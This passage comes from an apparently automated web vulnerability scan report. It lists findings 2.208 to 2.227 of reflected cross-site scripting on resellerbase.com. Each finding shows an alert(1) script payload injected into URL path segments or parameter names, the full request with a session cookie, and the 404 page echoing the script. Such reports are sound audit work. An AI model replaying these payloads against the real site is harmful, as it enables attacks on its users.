<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating4b794<script>alert(1)</script>451e90305c4/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.208. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61887<script>alert(1)</script>7b0fba868f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes61887<script>alert(1)</script>7b0fba868f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes61887<script>alert(1)</script>7b0fba868f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.209. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c304f<script>alert(1)</script>edd0e6e3249 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosc304f<script>alert(1)</script>edd0e6e3249/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosc304f<script>alert(1)</script>edd0e6e3249/images/ was not found on this server.</p>
...[SNIP]...

2.210. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c0fc2<script>alert(1)</script>69a8d555bc1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesc0fc2<script>alert(1)</script>69a8d555bc1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesc0fc2<script>alert(1)</script>69a8d555bc1/ was not found on this server.</p>
...[SNIP]...

2.211. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 91945<script>alert(1)</script>4c9e5f211d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/?91945<script>alert(1)</script>4c9e5f211d9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/?91945<script>alert(1)</script>4c9e5f211d9=1 was not found on this server.</p>
...[SNIP]...

2.212. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac0d9<script>alert(1)</script>47edd3b252f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultac0d9<script>alert(1)</script>47edd3b252f/personals-dating/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultac0d9<script>alert(1)</script>47edd3b252f/personals-dating/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.213. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af956<script>alert(1)</script>79f8718fc31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingaf956<script>alert(1)</script>79f8718fc31/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingaf956<script>alert(1)</script>79f8718fc31/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.214. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 505ac<script>alert(1)</script>0e4046e6f83 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes505ac<script>alert(1)</script>0e4046e6f83/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes505ac<script>alert(1)</script>0e4046e6f83/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.215. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5432c<script>alert(1)</script>06867c0e10f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos5432c<script>alert(1)</script>06867c0e10f/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos5432c<script>alert(1)</script>06867c0e10f/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.216. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ec621<script>alert(1)</script>a3e1a358374 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesec621<script>alert(1)</script>a3e1a358374/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesec621<script>alert(1)</script>a3e1a358374/folder.gif was not found on this server.</p>
...[SNIP]...

2.217. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8f501<script>alert(1)</script>9e3d09573d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/folder.gif8f501<script>alert(1)</script>9e3d09573d2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/folder.gif8f501<script>alert(1)</script>9e3d09573d2 was not found on this server.</p>
...[SNIP]...

2.218. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 51cde<script>alert(1)</script>6129bdc5840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/folder.gif?51cde<script>alert(1)</script>6129bdc5840=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/folder.gif?51cde<script>alert(1)</script>6129bdc5840=1 was not found on this server.</p>
...[SNIP]...

2.219. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3b71<script>alert(1)</script>230dbfe6196 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultf3b71<script>alert(1)</script>230dbfe6196/personals-dating/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultf3b71<script>alert(1)</script>230dbfe6196/personals-dating/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.220. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99b12<script>alert(1)</script>6b69acffc5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating99b12<script>alert(1)</script>6b69acffc5f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating99b12<script>alert(1)</script>6b69acffc5f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.221. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a4a8<script>alert(1)</script>fe61676dfc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes9a4a8<script>alert(1)</script>fe61676dfc1/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes9a4a8<script>alert(1)</script>fe61676dfc1/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.222. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ab94f<script>alert(1)</script>4a72a456a6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosab94f<script>alert(1)</script>4a72a456a6d/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosab94f<script>alert(1)</script>4a72a456a6d/images/rating/ was not found on this server.</p>
...[SNIP]...

2.223. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1df1<script>alert(1)</script>ade908387a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesb1df1<script>alert(1)</script>ade908387a6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesb1df1<script>alert(1)</script>ade908387a6/rating/ was not found on this server.</p>
...[SNIP]...

2.224. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 38cca<script>alert(1)</script>aa377895800 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating38cca<script>alert(1)</script>aa377895800/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating38cca<script>alert(1)</script>aa377895800/ was not found on this server.</p>
...[SNIP]...

2.225. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 953e1<script>alert(1)</script>6eb6b61c945 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/?953e1<script>alert(1)</script>6eb6b61c945=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/?953e1<script>alert(1)</script>6eb6b61c945=1 was not found on this server.</p>
...[SNIP]...

2.226. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 161c0<script>alert(1)</script>763acf89bb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult161c0<script>alert(1)</script>763acf89bb2/personals-dating/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult161c0<script>alert(1)</script>763acf89bb2/personals-dating/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.227. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

